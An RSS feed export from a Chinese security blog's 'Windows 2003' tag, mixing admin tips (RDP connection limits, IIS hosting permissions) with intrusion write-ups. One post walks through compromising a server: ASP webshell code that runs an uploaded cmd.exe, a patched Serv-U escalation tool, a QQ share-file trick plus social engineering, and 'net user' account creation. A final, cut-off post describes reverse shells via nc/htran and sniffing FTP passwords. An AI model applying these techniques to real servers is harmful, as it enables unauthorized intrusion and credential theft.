<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Chinadu&#039;s Blog &#187; Windows 2003</title>
	<atom:link href="http://www.4shell.org/archives/tag/windows-2003/feed" rel="self" type="application/rss+xml" />
	<link>http://www.4shell.org</link>
	<description>关注网络安全</description>
	<lastBuildDate>Fri, 10 Feb 2012 03:53:40 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>更改windows2003最大连接数</title>
		<link>http://www.4shell.org/archives/1720.html</link>
		<comments>http://www.4shell.org/archives/1720.html#comments</comments>
		<pubDate>Thu, 22 Apr 2010 14:52:25 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[Windows 2003]]></category>
		<category><![CDATA[小技巧]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1720.html</guid>
		<description><![CDATA[windows 2003中的远程桌面功能非常方便，但是初始设置只允许2个用户同时登陆。有些时候因为我在公司连接登陆后断开，同事在家里用其他用户登陆后断开，当我再进行连接的时候，总是报错“终端服务超过最大连接数”。这时候我和同事都不能登陆，有没有什么办法可以达到以下几个目的中的一个： 　　1. 为账号设定权限，管理员登陆的时候强制注销多余的用户。 　　2. 管理员登陆的时候自动接管在其他地方断开的状态（本来这个功能具备，但有些时候不行）。 　　3. 不安装总段服务的时候增加连接数（不是临时授权） 　　通过以下方法来增加连接数: 　　1.运行：services.msc，启用license logging。 2.打开win2k3的控制面板中的“授权”，点“添加许可”，输入要改的连接数。 3.添加完毕后再关闭 License Logging。 相关文章2012年01月31日 -- 命令行导出IIS配置信息2011年11月24日 -- 域内指定用户中马2011年06月6日 -- Linux下MySQL的load_file常用路径2011年06月6日 -- linux渗透小技巧2010年05月5日 -- 搞内网的一个小技巧2010年03月1日 -- 让千千静听不再弹出广告2010年01月27日 -- ASP.NET+Win2003虚拟主机安全设置2010年01月19日 -- 手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】2009年11月5日 -- MySQL导入数据库文件最大限制2048KB的修改解决办法2009年09月25日 -- 突破Windows 2003 200k限制的上传程序]]></description>
			<content:encoded><![CDATA[<p>windows 2003中的远程桌面功能非常方便，但是初始设置只允许2个用户同时登陆。有些时候因为我在公司连接登陆后断开，同事在家里用其他用户登陆后断开，当我再进行连接的时候，总是报错“终端服务超过最大连接数”。这时候我和同事都不能登陆，有没有什么办法可以达到以下几个目的中的一个：</p>
<p>　　1. 为账号设定权限，管理员登陆的时候强制注销多余的用户。<br />
　　2. 管理员登陆的时候自动接管在其他地方断开的状态（本来这个功能具备，但有些时候不行）。<br />
　　3. 不安装总段服务的时候增加连接数（不是临时授权）</p>
<p>　　通过以下方法来增加连接数:<br />
<span id="more-1720"></span><br />
　　1.运行：services.msc，启用license logging。<br />
     2.打开win2k3的控制面板中的“授权”，点“添加许可”，输入要改的连接数。<br />
     3.添加完毕后再关闭 License Logging。</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2012年01月31日 -- <a href="http://www.4shell.org/archives/2078.html" title="命令行导出IIS配置信息">命令行导出IIS配置信息</a></li><li>2011年11月24日 -- <a href="http://www.4shell.org/archives/2051.html" title="域内指定用户中马">域内指定用户中马</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1958.html" title="Linux下MySQL的load_file常用路径">Linux下MySQL的load_file常用路径</a></li><li>2011年06月6日 -- <a href="http://www.4shell.org/archives/1956.html" title="linux渗透小技巧">linux渗透小技巧</a></li><li>2010年05月5日 -- <a href="http://www.4shell.org/archives/1750.html" title="搞内网的一个小技巧">搞内网的一个小技巧</a></li><li>2010年03月1日 -- <a href="http://www.4shell.org/archives/1591.html" title="让千千静听不再弹出广告">让千千静听不再弹出广告</a></li><li>2010年01月27日 -- <a href="http://www.4shell.org/archives/1547.html" title="ASP.NET+Win2003虚拟主机安全设置">ASP.NET+Win2003虚拟主机安全设置</a></li><li>2010年01月19日 -- <a href="http://www.4shell.org/archives/1476.html" title="手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】">手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】</a></li><li>2009年11月5日 -- <a href="http://www.4shell.org/archives/1156.html" title="MySQL导入数据库文件最大限制2048KB的修改解决办法">MySQL导入数据库文件最大限制2048KB的修改解决办法</a></li><li>2009年09月25日 -- <a href="http://www.4shell.org/archives/1127.html" title="突破Windows 2003 200k限制的上传程序">突破Windows 2003 200k限制的上传程序</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1720.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ASP.NET+Win2003虚拟主机安全设置</title>
		<link>http://www.4shell.org/archives/1547.html</link>
		<comments>http://www.4shell.org/archives/1547.html#comments</comments>
		<pubDate>Wed, 27 Jan 2010 03:16:31 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[ASP.NET]]></category>
		<category><![CDATA[Windows 2003]]></category>
		<category><![CDATA[虚拟主机]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1547.html</guid>
		<description><![CDATA[我们举例详细说明在运行ASP.NET的 windows 2003虚拟主机上,对于多个ASP.NET站点的安全配置; 在这里,我们的站点目录放在D盘的www文件夹,假设现在有一个名叫fesend的虚拟主机用户,我们在www文件夹下建立 fesend 的文件夹来存放此用户的站点数据 其中要用到以下组及帐号： IIS_WPG 组（也称为 IIS 工作进程组，IIS Worker Process Group） Guests组 （来宾组，在系统中拥有最少的权限） Internet 来宾帐户 （匿名访问 Internet 信息服务的内置帐户） 启动 IIS 进程帐户 （用于启动进程外应用程序的 Internet 信息服务的内置帐户） 1 磁盘权限设置 ⑴ D盘根目录的权限设置如下,只保留Administrator和System,其他帐号全部删除 ⑵ 随后加入IIS_WPG组，并对IIS_WPG组设定如下图所示权限 ⑶ 建立IUSR_FESEND及IWAM_FESEND帐号 设置“IUSR_FESEND”帐号为“Guests”组，删除“Users”组 设置“IWAM_FESEND”帐号为“IIS_WPG”组，删除“Users”组 若您的虚拟主机上面运行多个站点，则可以按照以上的方法，建立多组 “IUSR_XXXX”“IWAM_XXXX” 帐号；每个运行ASP.NET的站点都需要一组这样的帐号； ⑷ 设定 fesend 用户站点根目录的安全权限，此示例的站点目录为“D:wwwfesend”， 此目录用于存放 fesend 用户的站点数据； 首先去除父目录继承来的权限（方法如下图），只保留“Administrators”和“SYSTEM” ，其他全部删除； 随后添加我们刚才建立的“IUSR_FESEND”“IWAM_FESEND”帐号，并赋予完全控制权限（修改权限 也可）；并应用该设定到下级所有目录中，按确定完成Web站点根目录权限设定。最终效果如下图所示： 2 IIS 设置 建立www.fesend.com站点，指向 [...]]]></description>
			<content:encoded><![CDATA[<div id="blog_text">
<p><span style="font-size: small;">我们举例详细说明在运行ASP.NET的 windows 2003虚拟主机上,对于多个ASP.NET站点的安全配置;<br />
在这里,我们的站点目录放在D盘的www文件夹,假设现在有一个名叫fesend的虚拟主机用户,我们在www文件夹下建立 fesend 的文件夹来存放此用户的站点数据</p>
<p></span><span style="font-size: small;">其中要用到以下组及帐号：<br />
IIS_WPG 组（也称为 IIS 工作进程组，IIS Worker Process Group）<br />
Guests组 （来宾组，在系统中拥有最少的权限）</p>
<p>Internet 来宾帐户 （匿名访问 Internet 信息服务的内置帐户）<br />
启动 IIS 进程帐户 （用于启动进程外应用程序的 Internet 信息服务的内置帐户）<br />
<span id="more-1547"></span></p>
<p>1 磁盘权限设置<br />
⑴ D盘根目录的权限设置如下,只保留Administrator和System,其他帐号全部删除<br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/031628bbr.gif" border="0" alt="" /><br />
⑵ 随后加入IIS_WPG组，并对IIS_WPG组设定如下图所示权限<br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/031628Qh7.gif" border="0" alt="" width="500" /><br />
⑶ 建立IUSR_FESEND及IWAM_FESEND帐号<br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/031628Poe.gif" border="0" alt="" width="500" /><br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/031629aBc.gif" border="0" alt="" width="500" /><br />
设置“IUSR_FESEND”帐号为“Guests”组，删除“Users”组<br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/0316299Nj.gif" border="0" alt="" width="500" /><br />
设置“IWAM_FESEND”帐号为“IIS_WPG”组，删除“Users”组<br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/031629UZb.gif" border="0" alt="" width="500" /><br />
若您的虚拟主机上面运行多个站点，则可以按照以上的方法，建立多组  “IUSR_XXXX”“IWAM_XXXX” 帐号；每个运行ASP.NET的站点都需要一组这样的帐号；</p>
<p>⑷ 设定 fesend 用户站点根目录的安全权限，此示例的站点目录为“D:wwwfesend”， 此目录用于存放 fesend 用户的站点数据；<br />
首先去除父目录继承来的权限（方法如下图），只保留“Administrators”和“SYSTEM” ，其他全部删除；<br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/031630gyg.gif" border="0" alt="" width="500" /></span></p>
<p><span style="font-size: small;">随后添加我们刚才建立的“IUSR_FESEND”“IWAM_FESEND”帐号，并赋予完全控制权限（修改权限 也可）；并应用该设定到下级所有目录中，按确定完成Web站点根目录权限设定。最终效果如下图所示：<br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/031630L6s.gif" border="0" alt="" width="500" /></p>
<p>2 IIS 设置<br />
建立www.fesend.com站点，指向 fesend 用户的站点目录 “D:wwwfesend”；<br />
⑴ 站点匿名访问帐号设置，修改成我们刚才建立的“IUSR_FESEND”帐号<br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/031630G8W.gif" border="0" alt="" width="500" /><br />
⑵ 创建名称为“FESEND”(名称可以任意)的应用程序池；<br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/031630cbn.gif" border="0" alt="" width="500" /><br />
接下来右键 FESEND  应用程序池-&gt;属性；打开标识标签，选择“配置”，用户名密码选择我们刚才建立的“IWAM_FESEND”帐号，如下图所示：<br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/031631vPz.gif" border="0" alt="" width="500" /><br />
⑶ 最后一步，设置“www.fesend.com”站点的应用程序池为上面建立的“FESEND”；<br />
<img src="http://www.4shell.org/wp-content/uploads/images/2010/01/031631HjQ.gif" border="0" alt="" width="500" /><br />
至此，fesend  用户的IIS站点就建立好了，服务器若存在多个站点，可以依次为多个站点进行配置，每个站点建立特定的访问帐号，这样虚拟主机的每个用户都拥有自己的权 限，只能访问自己的站点目录，不能互相访问，虚拟主机的安全性可以得到保障；</span></p>
</div>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年04月22日 -- <a href="http://www.4shell.org/archives/1720.html" title="更改windows2003最大连接数">更改windows2003最大连接数</a></li><li>2009年09月25日 -- <a href="http://www.4shell.org/archives/1127.html" title="突破Windows 2003 200k限制的上传程序">突破Windows 2003 200k限制的上传程序</a></li><li>2007年03月19日 -- <a href="http://www.4shell.org/archives/166.html" title="利用QQ文件共享漏洞入侵 Windows2003">利用QQ文件共享漏洞入侵 Windows2003</a></li><li>2007年02月11日 -- <a href="http://www.4shell.org/archives/144.html" title="提权之道（关于WNDOWS 2003 目录权限的初探）">提权之道（关于WNDOWS 2003 目录权限的初探）</a></li><li>2006年09月21日 -- <a href="http://www.4shell.org/archives/13.html" title="cmd.aspx">cmd.aspx</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1547.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>突破Windows 2003 200k限制的上传程序</title>
		<link>http://www.4shell.org/archives/1127.html</link>
		<comments>http://www.4shell.org/archives/1127.html#comments</comments>
		<pubDate>Fri, 25 Sep 2009 13:07:41 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[资源共享]]></category>
		<category><![CDATA[Windows 2003]]></category>
		<category><![CDATA[上传]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1127.html</guid>
		<description><![CDATA[作者：Netpatch 有的时候，我们需要上传大东西，但是由于W2K3默认上传限制为200KB。这个时候，不得不分包，依次上传，那个累呀！ 有人问为什么不用Microsoft.XMLHTTP和Adodb.Stream组件，直接从服务器上下载呢【要是不能访问网络呢？你会怎么做？】 于是有了这个超级上传程序。实践可以支持大于10M的文件! 暂时没测试出什么问题！若有问题,请留言！ 转载请保留版权。谢谢合作! SU.vbs ----- 客户端 s.asp ----- 服务端 使用方法: cscript su.vbs url local_file cscript su.vbs http://pcsec.org/s.asp c:\test.exe 下载地址：2003upload 相关文章2010年04月22日 -- 更改windows2003最大连接数2010年01月27日 -- ASP.NET+Win2003虚拟主机安全设置2009年12月28日 -- 突破防篡改 继续上传2009年09月29日 -- 动网多个版本上传漏洞2007年03月19日 -- 利用QQ文件共享漏洞入侵 Windows20032007年02月11日 -- 提权之道（关于WNDOWS 2003 目录权限的初探）]]></description>
			<content:encoded><![CDATA[<p>作者：Netpatch</p>
<p>有的时候，我们需要上传大东西，但是由于W2K3默认上传限制为200KB。这个时候，不得不分包，依次上传，那个累呀！<br />
有人问为什么不用Microsoft.XMLHTTP和Adodb.Stream组件，直接从服务器上下载呢【要是不能访问网络呢？你会怎么做？】</p>
<p>于是有了这个超级上传程序。实践可以支持大于10M的文件!</p>
<p>暂时没测试出什么问题！若有问题,请留言！</p>
<p>转载请保留版权。谢谢合作!</p>
<p>SU.vbs    -----    客户端<br />
s.asp    -----    服务端</p>
<p>使用方法:<br />
<span id="more-1127"></span><br />
cscript su.vbs url local_file</p>
<p>cscript su.vbs http://pcsec.org/s.asp c:\test.exe</p>
<p>下载地址：<a href="http://www.4shell.org/wp-content/uploads/2009/09/2003upload.rar">2003upload</a></p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年04月22日 -- <a href="http://www.4shell.org/archives/1720.html" title="更改windows2003最大连接数">更改windows2003最大连接数</a></li><li>2010年01月27日 -- <a href="http://www.4shell.org/archives/1547.html" title="ASP.NET+Win2003虚拟主机安全设置">ASP.NET+Win2003虚拟主机安全设置</a></li><li>2009年12月28日 -- <a href="http://www.4shell.org/archives/1368.html" title="突破防篡改 继续上传">突破防篡改 继续上传</a></li><li>2009年09月29日 -- <a href="http://www.4shell.org/archives/1135.html" title="动网多个版本上传漏洞">动网多个版本上传漏洞</a></li><li>2007年03月19日 -- <a href="http://www.4shell.org/archives/166.html" title="利用QQ文件共享漏洞入侵 Windows2003">利用QQ文件共享漏洞入侵 Windows2003</a></li><li>2007年02月11日 -- <a href="http://www.4shell.org/archives/144.html" title="提权之道（关于WNDOWS 2003 目录权限的初探）">提权之道（关于WNDOWS 2003 目录权限的初探）</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1127.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>利用QQ文件共享漏洞入侵 Windows2003</title>
		<link>http://www.4shell.org/archives/166.html</link>
		<comments>http://www.4shell.org/archives/166.html#comments</comments>
		<pubDate>Mon, 19 Mar 2007 11:22:43 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[QQ]]></category>
		<category><![CDATA[Windows 2003]]></category>

		<guid isPermaLink="false">http://202.172.32.240/~shellorg/archives/166.html</guid>
		<description><![CDATA[服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径。现在，著名的腾讯QQ又被列入了这些捷径名单，好在QQ并不是服务器必备的软件之一，所以相信不会造成大范围的危机。文中遇到特殊情况虽然不多，但大家还是应该遵照“可能的就应该防范”的原则做出相应防御。&#160;<br /><br />一、在Windows2003中得到的Webshell&#160;<br /><br />此次渗透的目标是一台OA办公系统服务器。其操作系统新近升级到了Windows2003，但OA仍存在asp文件上传漏洞，所以webshell的取得并没有任何悬念。阻碍是在权限提升时遇到的。&#160;
]]></description>
			<content:encoded><![CDATA[<p>服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径。现在，著名的腾讯QQ又被列入了这些捷径名单，好在QQ并不是服务器必备的软件之一，所以相信不会造成大范围的危机。文中遇到特殊情况虽然不多，但大家还是应该遵照“可能的就应该防范”的原则做出相应防御。</p>
<p>一、在Windows2003中得到的Webshell</p>
<p>此次渗透的目标是一台OA办公系统服务器。其操作系统新近升级到了Windows2003，但OA仍存在asp文件上传漏洞，所以webshell的取得并没有任何悬念。阻碍是在权限提升时遇到的。</p>
<p>登陆webshell后发现只能查看服务器的D盘，对C盘不能进行任何访问，webshell的提示是“没有权限”。这点早在意料之中，因为wenshell只有guests组权限，再加上win2003默认禁止了“Everyone"匿名用户及“Guest"组权限用户访问cmd.exe，还造成了不能通过webshell运行cmd.exe。</p>
<p>唯一值得庆幸的是利用Webshell 可以对D盘（存放有web虚拟目录）各个子目录进行读写。这里除了web虚拟目录还有一些数据备份文件和一个腾讯QQ安装目录Tencent。</p>
<p>二、破解Serv-u的终极防范</p>
<p>Windows2003的种种默认安全配置展示了它强大的一面，近一步提升现有权限似乎已不太可能，直到我试图从系统入手向这台服务器发出FTP链接请求并看到Serv-u的banner时才觉得又有了一线希望。</p>
<p>前面提到由于Windows2003对cmd.exe的权限限制，通过webshell方式不能运行cmd.exe，这样的论断在2004年6期的防线的《构建Windows2003堡垒主机》一文也曾提到,但实践表明这并不正确，通过webshell上传本地非2003系统中未受限制的cmd.exe文件到可执行目录，再通过wscript组件，同样能够通过webshell方式在Windows2003下获得相应权限的cmd.exe。结合nc.exe，甚至还能得到一个guest组权限的命令行下的shell。</p>
<p>为此，我对老兵的站长助手6.0做了一些改进，增加了如下代码，使其能够利用Wscript.shell组件运行本地上传的cmd.exe。</p>
<p>Function CmdShell()<br />
If Request("SP")&lt;&gt;"" Then Session("ShellPath") = Request("SP")<br />
ShellPath=Session("ShellPath")<br />
if ShellPath="" Then ShellPath = "cmd.exe"<br />
if Request("wscript")="yes" then<br />
checked=" checked"<br />
else<br />
checked=""<br />
end if<br />
If Request("cmd")&lt;&gt;"" Then DefCmd = Request("cmd")<br />
SI="</p>
<form method="post">
<input class="cmd" style="width: 92%;" name="cmd" />value='"DefCmd&amp;"'&gt;</p>
<input type="submit" value="运行" />"<br />
SI=SI&amp;"<textarea class="cmd" style="width: 100%; height: 500;">" &lt;br/&gt;If Request.Form("cmd")&lt;&gt;"" Then &lt;br/&gt;if Request.Form("wscript")="yes" then &lt;br/&gt;Set CM=CreateObject(ObT(1,0)) &lt;br/&gt;Set DD=CM.exec(ShellPath&amp;" /c "DefCmd) &lt;br/&gt;aaa=DD.stdout.readall &lt;br/&gt;SI=SI&amp;aaa &lt;br/&gt;else%&gt; &lt;br/&gt;&lt;object runat=server id=ws scope=page classid="clsid:72C24DD5-D70A-438B-8A42-&lt;br/&gt;98424B88AFB8"&gt;&lt;/object&gt; &lt;br/&gt;&lt;object runat=server id=ws scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-&lt;br/&gt;00C04FD58A0B"&gt;&lt;/object&gt; &lt;br/&gt;&lt;object runat=server id=fso scope=page classid="clsid:0D43FE01-F093-11CF-8940-&lt;br/&gt;00A0C9054228"&gt;&lt;/object&gt; &lt;br/&gt;&lt;%szTempFile = server.mappath("cmd.txt") &lt;br/&gt;Call ws.Run (ShellPath&amp;" /c " &amp; DefCmd &amp; " &gt; " &amp; szTempFile, 0, True) &lt;br/&gt;Set fs = CreateObject("Scripting.FileSystemObject") &lt;br/&gt;Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0) &lt;br/&gt;aaa=Server.HTMLEncode(oFilelcx.ReadAll) &lt;br/&gt;oFilelcx.Close &lt;br/&gt;Call fso.DeleteFile(szTempFile, True) &lt;br/&gt;SI=SI&amp;aaa &lt;br/&gt;end if &lt;br/&gt;End If &lt;br/&gt;SI=SI&amp;chr(13)&amp;"</textarea>"<br />
SI=SI&amp;"SHELL路径：</p>
<input style="width: 70%;" name="SP" value="&quot;&amp;ShellPath&amp;&quot;" /> "<br />
SI=SI&amp;"</p>
<input name="wscript" type="checkbox" value="yes" />WScript.Shell</form>
<p>"<br />
Response.Write SI<br />
End Function</p>
<p>利用时只需在shell路径中指定上传的cmd.exe路径，再选中选项Wscript就能运行一些所需权限较低的系统命令，如“net start”或者“netstat -an”，依次运行这两个命令后Webshell回显了众多服务，包括Serv-U FTP Server。</p>
<p>活动端口列表中又出现了43958端口，于是我自然想到了神通广大的Serv-u ftp Server本地权限提升漏洞。可真正用到的ftp本地权限提升工具在执行系统命令时，却出现了530错误提示。看来管理员或者其他人对Serv-u打上了布丁或者做了某些安全配置。</p>
<p>为了知道究竟是怎样的安全配置，上网查了查相关文章，其中有一篇《Serv-u ftp Server 本地权限提升漏洞的终极防范》很受欢迎，被多方转载，作者是世外高人xiaolu。从错误提示看很有可能做了该文所谓的终极防范，即对ServUDaemon.exe中默认的管理员或密码进行了修改。</p>
<p>当然这只是假设，只有将目标服务器上的ServUDaemon.exe下载下来看看具体配置才能确定，但是安装有Serv-u的C盘禁止访问，包括Programe files 目录，权限提升再次受阻。</p>
<p>三、利用QQ2005共享文件漏洞将权限提升到底</p>
<p>再次翻了翻D盘，又见到了那个很少能在服务器中看到的Tencent文件夹。查看whatsnew.txt。</p>
<p>得知QQ的版本是QQ2005 Beta1，几个于相关文件的创建时间也说明网管最近在服务器上登陆过QQ。难道只能用QQ？经过一番思索，终于想到一个可以利用的QQ2005在文件共享功能上的一则漏洞。</p>
<p>该漏洞是随着QQ2005贺岁版新增功能出现的。可以将其危害描述为：利用该漏洞，攻击者可以浏览，读取用户系统中的任意文件（如sam文件、数据备份文件、敏感信息文件）。影响系统：安装有QQ2005贺岁版以上的所有Windows系列操作系统。</p>
<p>具体利用方法是：先在本机登陆自己的QQ，调出“QQ菜单”，选择工具－&gt;设置共享，指定C:\或者其他任何有利用价值的分区为共享文件，完成后关闭QQ，找到安装目录下的以QQ帐号命名的文件夹内“ShareInfo.db”文件。上传覆盖目标服务器上相同文件（如：D:\Tencent\QQ\654321\ShareInfo.db）。这样，当网管在服务器上登陆QQ时就会向好友开放C盘为共享目录。</p>
<p>因为陌生人是不能共享对方文件，所以还需要用社会工程学申请将管理员加为好友(理由当然越可信越好)。如果管理员通过请求，服务器的C盘会以QQ共享文件目录的名义被共享，原本不能通过WEBSHELL访问的ServUDaemon.exe文件就能被下载，遇到阻碍的权限提升之路又能继续了。</p>
<p>当晚管理员就通过了申请，将我添加为好友。珊瑚虫QQ上显示的IP正是目标服务器的IP，于是下载了ServUDaemon.exe文件，用UE打开后查找127.0.0.1，发现默认配置下的内置帐户“LocalAdministrator”果然被改成了“LocalAdministruser”。</p>
<p>这看起来是一个很“终极”的防御，但提出该方法的xiaolu似乎没有进行攻防所须的换位思考就将其公布，要知道攻击者只需知道修改后的配置，并对本地权限提升利用工具进行相应的修改，所谓的终极防御也就被攻破了。方法还是用UE打开脱了壳的serv-u本地权限提升利用工具，将LocalAdministrator改为LocalAdministruser即可。</p>
<p>然后上传修改后的ftp2.exe，在wscript.shell中执行D:\web\ftp2.exe “net user user password /add”后看看结果，已经成功添加了一个用户。再把该用户加入administrators组和“Remote desktop users”组后登陆了目标服务器的远程桌面。</p>
<p>经过重重险阻，终于彻底攻陷了这台坚固的Windows2003堡垒。</p>
<p>四、简单启示</p>
<p>可以看出，和“服务越少越安全”一样，服务器上运行的“第三方”越少越安全，流行的PcAnywhere、VNC、Serv-U 权限提升和这里提出的利用QQ2005提升权限，都是可以这样避免。</p>
<h2  class="related_post_title">相关文章</h2><ul class="related_post"><li>2010年04月22日 -- <a href="http://www.4shell.org/archives/1720.html" title="更改windows2003最大连接数">更改windows2003最大连接数</a></li><li>2010年01月27日 -- <a href="http://www.4shell.org/archives/1547.html" title="ASP.NET+Win2003虚拟主机安全设置">ASP.NET+Win2003虚拟主机安全设置</a></li><li>2009年11月7日 -- <a href="http://www.4shell.org/archives/1161.html" title="破解QQ密码">破解QQ密码</a></li><li>2009年09月25日 -- <a href="http://www.4shell.org/archives/1127.html" title="突破Windows 2003 200k限制的上传程序">突破Windows 2003 200k限制的上传程序</a></li><li>2009年07月29日 -- <a href="http://www.4shell.org/archives/976.html" title="腾讯QQ2009漏洞">腾讯QQ2009漏洞</a></li><li>2007年04月4日 -- <a href="http://www.4shell.org/archives/172.html" title="QQ相册被黑,相册首页遭人修改">QQ相册被黑,相册首页遭人修改</a></li><li>2007年03月13日 -- <a href="http://www.4shell.org/archives/149.html" title="珊瑚虫QQ被判赔偿腾讯十万 网友众说纷纭">珊瑚虫QQ被判赔偿腾讯十万 网友众说纷纭</a></li><li>2007年02月11日 -- <a href="http://www.4shell.org/archives/144.html" title="提权之道（关于WNDOWS 2003 目录权限的初探）">提权之道（关于WNDOWS 2003 目录权限的初探）</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/166.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>提权之道（关于WNDOWS 2003 目录权限的初探）</title>
		<link>http://www.4shell.org/archives/144.html</link>
		<comments>http://www.4shell.org/archives/144.html#comments</comments>
		<pubDate>Sun, 11 Feb 2007 02:10:39 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[Windows 2003]]></category>
		<category><![CDATA[提权]]></category>

		<guid isPermaLink="false">http://202.172.32.240/~shellorg/archives/144.html</guid>
		<description><![CDATA[首先我说明，此文只做为技术交流，同时也并没有什么技术。<br />前几天再检测有一个服务器的时候，（虚拟主机）管理员的设置很BT，虽然没有禁止WS，但是呢，CMD等文件均不可以访问，并且不能运行任何系统命令，上传一个MT.exe&#160;到了网站目录，可写，并且使用WS可以运行，因此我首先想到的就是利用WS的命令达到提权，因为没装VNC，PCANwhere，至于系统漏洞的本地提权也就不用去试都知道了，行不通的,所以拿系统权限只有靠FTP了，但是呢管理员把FTP的本地密码改了，如果是6.2的话，你还可能可以下回来查看到密码，可惜的是6.3看密码是没有希望了，这个时候想到的自然是SNIFFER，这个时候，自然是想到了使用htran和NC，把端口重定向过来。<br />反弹回来之后就是目录限制的问题了，我已经遇到了很多个服务器，基本上都是这样，把你的权限限制在&#160;C:\windows\system32\inetsrv&#160;目录里面了，&#160;C：的根目录你可以进去，但是无可写权限，大家都知道WINDOWS\TEMP可写，但问题是反弹回来的SHELL无权限DIR的，更加别说权限MD了，因此很是郁闷，毕竟是连网站目录也跳转不到了，所以就是上传了XSNIFFER也没有用，无奈之下，想了很久在里面瞎逛了很久，最后当我切入到&#160;ASP&#160;Compiled&#160;Templates&#160;目录的时候随便输入一个&#160;：&#160;md&#160;123&#160;然后是&#160;cd&#160;123&#160;结果，我还真的进到了123&#160;的目录，然后赶快退出来，立刻再MD&#160;WOKAO&#160;cd&#160;wokao之后，就发现了，这个目录可写，然后在ASP木马里面输入路径：C:\windows\system32\inetsrv\ASP&#160;Compiled&#160;Templates&#160;结果发现，ASP木马对该目录竟然连访问权都没有，这个时候大家或许就明白了，反弹回来的SHELL的权限与网站的权限是不一样的，呵呵，到了这里，自然就是轻车路熟了，继续之前的想法，架设一个&#160;TFTP服务器，&#160;TFTP了一个XSNIFFER出来，然后在本地嗅探，以后就是等了，到第2天，自然就是&#160;ctrl+c&#160;终止嗅叹之后，立刻查看：password.txt&#160;了，拿下目标站的管理员FTP。然后自然就是&#160;OPEN&#160;xxxxxxxx&#160;进入该站了目录了···<br /><br />PS:有一点不是很明白，既然是通过IIS反弹回来的SHELL，那么应该是继承了IIS的权限，但是，基于IIS的权限，有2点不明白，第一，ASP木马为何无权限访问该目录，第二，为何改反弹回来的SHELL无法切入到网站根目录？&#160;
]]></description>
			<content:encoded><![CDATA[<p>首先我说明，此文只做为技术交流，同时也并没有什么技术。<br />
前几天再检测有一个服务器的时候，（虚拟主机）管理员的设置很BT，虽然没有禁止WS，但是呢，CMD等文件均不可以访问，并且不能运行任何系统命令，上传一个MT.exe 到了网站目录，可写，并且使用WS可以运行，因此我首先想到的就是利用WS的命令达到提权，因为没装VNC，PCANwhere，至于系统漏洞的本地提权也就不用去试都知道了，行不通的,所以拿系统权限只有靠FTP了，但是呢管理员把FTP的本地密码改了，如果是6.2的话，你还可能可以下回来查看到密码，可惜的是6.3看密码是没有希望了，这个时候想到的自然是SNIFFER，这个时候，自然是想到了使用htran和NC，把端口重定向过来。<br />
